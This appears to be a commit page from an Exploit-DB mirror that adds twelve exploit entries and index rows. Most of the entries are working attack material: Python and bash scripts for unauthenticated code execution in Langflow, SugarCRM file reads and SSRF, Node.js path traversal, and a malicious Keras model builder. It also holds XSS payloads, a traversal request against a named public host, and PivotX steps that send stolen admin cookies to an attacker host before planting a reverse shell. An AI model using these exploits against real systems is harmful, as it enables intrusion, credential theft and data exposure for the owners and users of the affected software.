bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-07-17

Browse source 
12 changes to exploits/shellcodes/ghdb

TOTOLINK N300RB 8.54 - Command Execution

MikroTik RouterOS 7.19.1 - Reflected XSS

Langflow 1.2.x - Remote Code Execution (RCE)

PivotX 3.0.0 RC3 - Remote Code Execution (RCE)

SugarCRM 14.0.0 - SSRF/Code Injection

White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)

WP Publications WordPress Plugin 1.2 - Stored XSS

NodeJS 24.x - Path Traversal

Keras 2.15 - Remote Code Execution (RCE)

Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege

Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges

Microsoft Outlook - Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2025-07-17 00:16:33 +00:00
parent 1c08d6e575
commit 08e51ef2f9
12 changed files with 786 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
exploits/multiple/hardware/52363.txt Normal file
View file

@ -0,0 +1,16 @@
# Title: TOTOLINK N300RB 8.54 - Command Execution
# Author: Skander BELABED - Magellan Sécurité
# Date: 07/11/2025
# Vendor: TOTOLINK
# Product: N300RB
# Firmware version: 8.54
# CVE: CVE-2025-52089
## Description:
A hidden remote support feature protected by a static secret in TOTOLINK
N300RB firmware version 8.54 allows an authenticated attacker to execute
arbitrary OS commands with root privileges.
# Reproduce:
[href](
https://0x09.dev/posts/toto_decouvre_une_interface_de_debug/)

20
exploits/multiple/remote/52366.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: MikroTik RouterOS 7.19.1 - Reflected XSS
# Google Dork: inurl:/login?dst=
# Date: 2025-07-15
# Exploit Author: Prak Sokchea
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: RouterOS <= 7.19.1
# Tested on: MikroTik CHR 7.19.1
# CVE : CVE-2025-6563
# PoC:
# Visit the following URL while connected to the vulnerable MikroTik hotspot service:
# http://<target-ip>/login?dst=javascript:alert(3)
# A reflected XSS will be triggered when the dst parameter is not properly sanitized by the server-side logic.
# This vulnerability requires user interaction (visiting the link) and may be used in phishing or redirection attacks.
# Notes:
# This is a non-persistent reflected XSS. It is accepted due to the presence of a valid CVE (CVE-2025-6563),
# and has been acknowledged by MikroTik as a valid issue.

45
exploits/multiple/webapps/52361.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
# Date: July 2025
# Exploit Author: HayToN
# Vendor Homepage: https://github.com/pivotx
# Software Link: https://github.com/pivotx/PivotX
# Version: 3.0.0 RC3
# Tested on: Debian 11, PHP 7.4
# CVE : CVE-2025-52367
## Vulnerability Type:
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
## Root Cause:
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
Note: If you are already admin, skip steps 1-7
## Exploitation Steps:
1. Login as an authenticated user (normal user, no need for admin).
2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page
3. Create locally a JavaScript file contaning cookie stealing code.
For example: lol.js
Containing:
document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;
4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):
<script src="http://LOCAL_IP/lol.js"></script>
5. Publish the page.
6. When an admin views the published page in the blog, the XSS will execute in the admins context.
7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.
8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file
9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.
10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)
# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3

90
exploits/multiple/webapps/52364.py Executable file
View file

@ -0,0 +1,90 @@
#!/usr/bin/env python3
# Exploit Title: Langflow 1.2.x - Remote Code Execution (RCE)
# Date: 2025-07-11
# Exploit Author: Raghad Abdallah Al-syouf
# Vendor Homepage: https://github.com/logspace-ai/langflow
# Software Link: https://github.com/logspace-ai/langflow/releases
# Version: <= 1.2.x
# Tested on: Ubuntu / Docker
# CVE: CVE-2025-3248
# Description:
#Langflow exposes a vulnerable endpoint `/api/v1/validate/code` that improperly evaluates arbitrary Python code via the `exec()` function. An unauthenticated remote attacker can execute arbitrary system commands.
# Usage:
#python3 cve-2025-3248.py http://target:7860 "id"
import requests
import argparse
import json
from urllib.parse import urljoin
from colorama import Fore, Style, init
import random
init(autoreset=True)
requests.packages.urllib3.disable_warnings()
BANNER_COLORS = [Fore.MAGENTA, Fore.CYAN, Fore.LIGHTBLUE_EX]
def show_banner():
print(f"""{Style.BRIGHT}{random.choice(BANNER_COLORS)}
Langflow <= 1.2.x - CVE-2025-3248
Remote Code Execution via exposed API
No authentication triggers exec() call
Author: Raghad Abdallah Al-syouf
{Style.RESET_ALL}""")
class LangflowRCE:
def __init__(self, target_url, timeout=10):
self.base_url = target_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.session.headers = {
"User-Agent": "Langflow-RCE-Scanner",
"Content-Type": "application/json"
}
self.timeout = timeout
def run_payload(self, command):
endpoint = urljoin(self.base_url, "/api/v1/validate/code")
payload = {
"code": (
f"def run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass"
)
}
print(f"{Fore.YELLOW}[+] Sending crafted payload to: {endpoint}")
try:
response = self.session.post(endpoint, data=json.dumps(payload), timeout=self.timeout)
print(f"{Fore.YELLOW}[+] HTTP {response.status_code}")
if response.status_code == 200:
try:
json_data = response.json()
err = json_data.get("function", {}).get("errors", [""])[0]
if isinstance(err, str) and err.startswith("b'"):
output = err[2:-1].encode().decode("unicode_escape").strip()
return output or "[!] No output returned."
except Exception as e:
return f"[!] Error parsing response: {e}"
return "[!] Target may not be vulnerable or is patched."
except Exception as e:
return f"[!] Request failed: {e}"
def main():
parser = argparse.ArgumentParser(description="PoC - CVE-2025-3248 | Langflow <= v1.2.x Unauthenticated RCE")
parser.add_argument("url", help="Target URL (e.g., http://localhost:7860)")
parser.add_argument("cmd", help="Command to execute remotely (e.g., whoami)")
args = parser.parse_args()
show_banner()
exploit = LangflowRCE(args.url)
result = exploit.run_payload(args.cmd)
print(f"\n{Fore.GREEN}[+] Command Output:\n{Style.RESET_ALL}{result}")
if __name__ == "__main__":
main()

56
exploits/multiple/webapps/52365.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection
# Author: Egidio Romano aka EgiX
# Email : n0b0d13s@gmail.com
# Software Link: https://www.sugarcrm.com
# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
# CVE Reference: CVE-2024-58258
# Vulnerability Description:
User input passed through GET parameters to the /css/preview REST API
endpoint is not properly sanitized before parsing it as LESS code. This can
be exploited by remote, unauthenticated attackers to inject and execute
arbitrary LESS directives. By abusing the @import LESS statement, an
attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
local files on the web server, potentially leading to the disclosure of
sensitive information.
# Proof of Concept:
#!/bin/bash
echo
echo "+----------------------------------------------------------------------+";
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
echo "+----------------------------------------------------------------------+";
if [ "$#" -ne 2 ]; then
echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n"
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
exit 1
fi
urlencode() {
echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
}
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}")
if echo "$RESPONSE" | grep -q "________"; then
echo -e "\nOutput for '$2':\n"
echo "$RESPONSE" | sed '/________/q' | grep -v '________'
echo
else
echo -e "\nError: exploit failed!\n"
exit 2
fi
# Credits: Vulnerability discovered by Egidio Romano.
# Original Advisory: http://karmainsecurity.com/KIS-2025-04
# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/

34
exploits/multiple/webapps/52367.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal
# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*
# Example curl command:
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
# Notes:
# - Vulnerability confirmed on public instance at time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.
# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09

60
exploits/multiple/webapps/52368.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605
## Vulnerability Details
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
---
## Proof of Concept (PoC)
1. SSH into the server and navigate to the plugin directory:
```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```
2. Run the following command to create a malicious BibTeX file:
```bash
touch "<img src=x onerror=alert('XSS')>.bib"
```
3. Access the plugin's BibTeX browser via the following URL:
```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```
4. The injected JavaScript will be executed, triggering the XSS payload:
```javascript
alert('XSS');
```
---
## Impact
* Stored XSS (JavaScript) is executed in the context of the admin panel.
* Bypasses `unfiltered_html` protection in multisite environments.
* Can be used for privilege escalation, cookie theft, or injecting malicious content.
---
## Recommendation
Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
---
## References
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)

149
exploits/nodejs/remote/52369.py Executable file
View file

@ -0,0 +1,149 @@
# Exploit Title : NodeJS 24.x - Path Traversal
# Exploit Author : Abdualhadi khalifa
# CVE : CVE-2025-27210
import argparse
import requests
import urllib.parse
import json
import sys
def exploit_path_traversal_precise(target_url: str, target_file: str, method: str) -> dict:
traverse_sequence = "..\\" * 6
normalized_target_file = target_file.replace("C:", "").lstrip("\\/")
malicious_path = f"{traverse_sequence}AUX\\..\\{normalized_target_file}"
encoded_malicious_path = urllib.parse.quote(malicious_path, safe='')
full_url = f"{target_url}/{encoded_malicious_path}"
response_data = {
"target_url": target_url,
"target_file_attempted": target_file,
"malicious_path_sent_raw": malicious_path,
"malicious_path_sent_encoded": encoded_malicious_path,
"full_request_url": full_url,
"http_method": method,
"success": False,
"response_status_code": None,
"response_content_length": None,
"extracted_content": None,
"error_message": None
}
try:
print(f"[*] Preparing precise Path Traversal exploit...")
print(f"[*] Malicious Path (Encoded): {encoded_malicious_path}")
print(f"[*] Request URL: {full_url}")
if method.upper() == 'GET':
response = requests.get(full_url, timeout=15)
elif method.upper() == 'POST':
response = requests.post(f"{target_url}", params={'filename': encoded_malicious_path}, timeout=15)
else:
raise ValueError("Unsupported HTTP method. Use 'GET' or 'POST'.")
response_data["response_status_code"] = response.status_code
response_data["response_content_length"] = len(response.content)
if response.status_code == 200:
content = response.text
response_data["extracted_content"] = content
if target_file.lower().endswith("win.ini") and "[windows]" in content.lower():
response_data["success"] = True
elif len(content) > 0: # For any other file, just check for non-empty content.
response_data["success"] = True
else:
response_data["error_message"] = "Received 200 OK, but content is empty or unexpected."
else:
response_data["error_message"] = f"Server responded with non-200 status code: {response.status_code}"
except requests.exceptions.Timeout:
response_data["error_message"] = "Request timed out. Server might be slow or unresponsive."
except requests.exceptions.ConnectionError:
response_data["error_message"] = "Connection failed to target. Ensure the Node.js application is running and accessible."
except ValueError as ve:
response_data["error_message"] = str(ve)
except Exception as e:
response_data["error_message"] = f"An unexpected error occurred: {str(e)}"
return response_data
def main():
parser = argparse.ArgumentParser(
prog="CVE-2025-27210_NodeJS_Path_Traversal_Exploiter.py",
description="""
Proof of Concept (PoC) for a precise Path Traversal vulnerability in Node.js on Windows (CVE-2025-27210).
This script leverages how Node.js functions (like path.normalize() or path.join())
might mishandle reserved Windows device file names (e.g., CON, AUX) within Path Traversal
sequences.
""",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument(
"-t", "--target",
type=str,
required=True,
help="Base URL of the vulnerable Node.js application endpoint (e.g., http://localhost:3000/files)."
)
parser.add_argument(
"-f", "--file",
type=str,
default="C:\\Windows\\win.ini",
help="""Absolute path to the target file on the Windows system.
Examples: C:\\Windows\\win.ini, C:\\secret.txt, C:\\Users\\Public\\Documents\\important.docx
"""
)
parser.add_argument(
"-m", "--method",
type=str,
choices=["GET", "POST"],
default="GET",
help="HTTP method for the request ('GET' or 'POST')."
)
args = parser.parse_args()
# --- CLI Output Formatting ---
print("\n" + "="*70)
print(" CVE-2025-27210 Node.js Path Traversal Exploit PoC")
print("="*70)
print(f"[*] Target URL: {args.target}")
print(f"[*] Target File: {args.file}")
print(f"[*] HTTP Method: {args.method}")
print("-"*70 + "\n")
result = exploit_path_traversal_precise(args.target, args.file, args.method)
print("\n" + "-"*70)
print(" Exploit Results")
print("-"*70)
print(f" Request URL: {result['full_request_url']}")
print(f" Malicious Path Sent (Raw): {result['malicious_path_sent_raw']}")
print(f" Malicious Path Sent (Encoded): {result['malicious_path_sent_encoded']}")
print(f" Response Status Code: {result['response_status_code']}")
print(f" Response Content Length: {result['response_content_length']} bytes")
if result["success"]:
print("\n [+] File successfully retrieved! Content below:")
print(" " + "="*66)
print(result["extracted_content"])
print(" " + "="*66)
else:
print("\n [-] File retrieval failed or unexpected content received.")
if result["error_message"]:
print(f" Error: {result['error_message']}")
elif result["extracted_content"]:
print("\n Response content (partial, may indicate server error or unexpected data):")
print(" " + "-"*66)
# Truncate long content if not fully successful
print(result["extracted_content"][:1000] + "..." if len(result["extracted_content"]) > 1000 else result["extracted_content"])
print(" " + "-"*66)
print("\n" + "="*70)
print(" Complete")
print("="*70 + "\n")
if __name__ == "__main__":
main()

125
exploits/python/remote/52359.py Executable file
View file

@ -0,0 +1,125 @@
#!/usr/bin/env python3
# Exploit Title: Keras 2.15 - Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-09
# Tested on: Ubuntu 22.04 LTS, Python 3.10, TensorFlow/Keras <= 2.15
# CVE: CVE-2025-1550
# Type: Remote Code Execution (RCE)
# Platform: Python / Machine Learning (Keras)
# Author Country: Jordan
# Attack Vector: Malicious .keras file (client-side code execution via deserialization)
# Description:
# This exploit abuses insecure deserialization in Keras model loading. By embedding
# a malicious "function" object inside a .keras file (or config.json), an attacker
# can execute arbitrary system commands as soon as the model is loaded using
# `keras.models.load_model()` or `model_from_json()`.
#
# This PoC generates a .keras file which, when loaded, triggers a reverse shell or command.
# Use only in safe, sandboxed environments!
#
# Steps of exploitation:
# 1. The attacker creates a fake Keras model using a specially crafted config.json.
# 2. The model defines a Lambda layer with a "function" deserialized from the `os.system` call.
# 3. When the victim loads the model using `load_model()`, the malicious function is executed.
# 4. Result: Arbitrary Code Execution under the user running the Python process.
# Affected Versions:
# - Keras <= 2.15
# - TensorFlow versions using unsafe deserialization paths (prior to April 2025 patch)
#
# Usage:
# $ python3 exploit_cve_2025_1550.py
# [*] Loads the malicious model
# [✓] Executes the payload (e.g., creates a file in /tmp)
#
#
# Options:
# - PAYLOAD: The command to execute upon loading (default: touch /tmp/pwned_by_keras)
# - You may change this to: reverse shell, download script, etc.
# Example:
# $ python3 exploit_cve_2025_1550.py
# [+] Created malicious model: malicious_model.keras
# [*] Loading malicious model to trigger exploit...
# [✓] Model loaded. If vulnerable, payload should be executed.
import os
import json
from zipfile import ZipFile
import tempfile
import shutil
from tensorflow.keras.models import load_model
PAYLOAD = "touch /tmp/pwned_by_keras"
def create_malicious_config():
return {
"class_name": "Functional",
"config": {
"name": "pwned_model",
"layers": [
{
"class_name": "Lambda",
"config": {
"name": "evil_lambda",
"function": {
"class_name": "function",
"config": {
"module": "os",
"function_name": "system",
"registered_name": None
}
},
"arguments": [PAYLOAD]
}
}
],
"input_layers": [["evil_lambda", 0, 0]],
"output_layers": [["evil_lambda", 0, 0]]
}
}
def build_malicious_keras(output_file="malicious_model.keras"):
tmpdir = tempfile.mkdtemp()
try:
config_path = os.path.join(tmpdir, "config.json")
with open(config_path, "w") as f:
json.dump(create_malicious_config(), f)
metadata_path = os.path.join(tmpdir, "metadata.json")
with open(metadata_path, "w") as f:
json.dump({"keras_version": "2.15.0"}, f)
weights_path = os.path.join(tmpdir, "model.weights.h5")
with open(weights_path, "wb") as f:
f.write(b"\x89HDF\r\n\x1a\n") # توقيع HDF5
with ZipFile(output_file, "w") as archive:
archive.write(config_path, arcname="config.json")
archive.write(metadata_path, arcname="metadata.json")
archive.write(weights_path, arcname="model.weights.h5")
print(f"[+] Created malicious model: {output_file}")
finally:
shutil.rmtree(tmpdir)
def trigger_exploit(model_path):
print("[*] Loading malicious model to trigger exploit...")
load_model(model_path)
print("[✓] Model loaded. If vulnerable, payload should be executed.")
if __name__ == "__main__":
keras_file = "malicious_model.keras"
build_malicious_keras(keras_file)
trigger_exploit(keras_file)

86
exploits/windows/local/52360.txt Normal file
View file

@ -0,0 +1,86 @@
# Titles: Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege
# Author: nu11secur1ty
# Date: 07/09/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en-us/windows/windows-11?r=1
# Reference: https://portswigger.net/web-security/access-control
# CVE-2025-49677
## Description
This Proof of Concept (PoC) demonstrates an interactive SYSTEM shell
exploit for CVE-2025-49677.
It leverages scheduled tasks and a looping batch script running as SYSTEM
to execute arbitrary commands
with NT AUTHORITY\SYSTEM privileges and interactively returns command
output.
# [more](https://github.com/advisories/GHSA-69q2-qmcc-6rh3)
# [Reference](
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49677)
## Usage
1. Run the Python script as Administrator on the vulnerable Windows machine.
2. The script creates a scheduled task that runs a batch script as SYSTEM
user.
3. You get an interactive prompt (`SYSTEM>`) in your Python console.
4. Type any Windows command (e.g. `whoami`, `dir`, `net user`) and see the
SYSTEM-level output.
5. Type `exit` to quit and clean up all temporary files and scheduled tasks.
## Files
- `PoC.py`: Python script implementing the exploit and interactive shell.
- `README.md`: This readme file.
## Requirements
- Python 3.x installed on Windows.
- Run the script with Administrator privileges.
- The script uses built-in Windows commands (schtasks, cmd.exe, timeout).
## Disclaimer
Use this PoC only in authorized environments for testing and research
purposes.
Disclosure responsibly. The author and nu11secur1ty are not responsible for
misuse.
---
# Video:
[href](https://www.youtube.com/watch?v=b_TrOtCKPkg)
# Source:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-49677)
# Buy me a coffee if you are not ashamed:
[href](https://satoshidisk.com/pay/COp6jB)
# Time spent:
05:35:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

93
exploits/windows/local/52362.txt Normal file
View file

@ -0,0 +1,93 @@
**Exploit Title : Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges
**Author:** nu11secur1ty
**Date:** 07/11/2025
---
## Overview
This repository contains a PowerShell script to **validate whether a
Windows 11 system is vulnerable to CVE-2025-49744**—a critical local
privilege escalation vulnerability involving the `gdi32.dll` and
`win32kfull.sys` system components.
The script performs the following checks:
- Windows build number validation
- Installed hotfixes, focusing on July 2025 patches including **KB5039302**
- Binary timestamp verification of critical system files
- Safe, non-destructive GDI32 API interaction test
---
## PoC Validator
[href](https://raw.githubusercontent.com/nu11secur1ty/CVE-mitre/refs/heads/main/2025/CVE-2025-49744/Validate-CVE-2025-49744-PoC.ps1)
## Usage
1. Open **PowerShell as Administrator**.
2. Download or clone this repository to your system.
3. Run the script:
```powershell
.\Validate-CVE-2025-49744-PoC.ps1
## Output
[CVE-2025-49744 PoC Validator] by nu11secur1ty
[*] Windows Build Number: 26100
[*] July 2025 Hotfixes installed:
-> KB5056579 (7/9/2025)
-> KB5039302 (7/9/2025)
[*] Checking critical system binary timestamps:
gdi32.dll: Version 10.0.26100.4484, Last Write Time: 7/9/2025
[✓] Binary appears patched.
[*] Running safe GDI32 API interaction test...
[+] GDI32 CreateSolidBrush succeeded (handle: 12345)
[✓] SYSTEM STATUS: Patched against CVE-2025-49744.
```
## Important Notes
- This script does not exploit or alter the system. It only performs
validation and safe API calls.
- Keep your system regularly updated with official Microsoft patches.
- Use this tool for awareness and compliance in your security assessments.
## License
MIT License (or specify your preferred license)
## References
- [CVE-2025-49744](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49744)
on MITRE
- Microsoft Security Bulletin - July 2025
- PowerShell documentation
## Video demo:
[href](https://www.youtube.com/watch?v=SR2pWoncfw4)
## Buy the real exploit:
[href](https://satoshidisk.com/pay/COq10D)
## Disclaimer
Use this tool responsibly and only on systems you own or have explicit
permission to test.
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

13
files_exploits.csv
View file

@ -10428,6 +10428,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-13,0,CVE-2024-33896,,,,,
52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52363,exploits/multiple/hardware/52363.txt,"TOTOLINK N300RB 8.54 - Command Execution",2025-07-16,"Skander BELABED - Magellan Sécurité",hardware,multiple,,2025-07-16,2025-07-16,0,CVE-2025-52089,,,,,https://0x09.dev/posts/toto_decouvre_une_interface_de_debug/
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
@ -11219,6 +11220,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
52366,exploits/multiple/remote/52366.txt,"MikroTik RouterOS 7.19.1 - Reflected XSS",2025-07-16,"Prak Sokchea",remote,multiple,,2025-07-16,2025-07-16,0,CVE-2025-6563,,,,,
12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip,
36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz,
3708,exploits/multiple/remote/3708.html,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,remote,multiple,,2007-04-10,2016-09-26,1,OSVDB-50022;CVE-2007-0919,,,,http://www.exploit-db.comminiwebsvr_0.0.7-win32.tar.gz,
@ -12130,6 +12132,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,webapps,multiple,,2010-06-29,2014-08-01,1,,,,,,https://www.securityfocus.com/bid/41229/info
52097,exploits/multiple/webapps/52097.NA,"KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)",2025-03-27,"Okan Kurtulus",webapps,multiple,,2025-03-27,2025-04-13,0,CVE-2024-46528,,,,,https://github.com/advisories/GHSA-p26r-gfgc-c47h
52125,exploits/multiple/webapps/52125.py,"Kubio AI Page Builder 2.5.1 - Local File Inclusion (LFI)",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2025-2294,,,,,
52364,exploits/multiple/webapps/52364.py,"Langflow 1.2.x - Remote Code Execution (RCE)",2025-07-16,"Raghad Abdallah Al-syouf",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2025-3248,,,,,
49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,,2020-05-11,2020-05-11,0,,,,,,
49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@ -12324,6 +12327,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
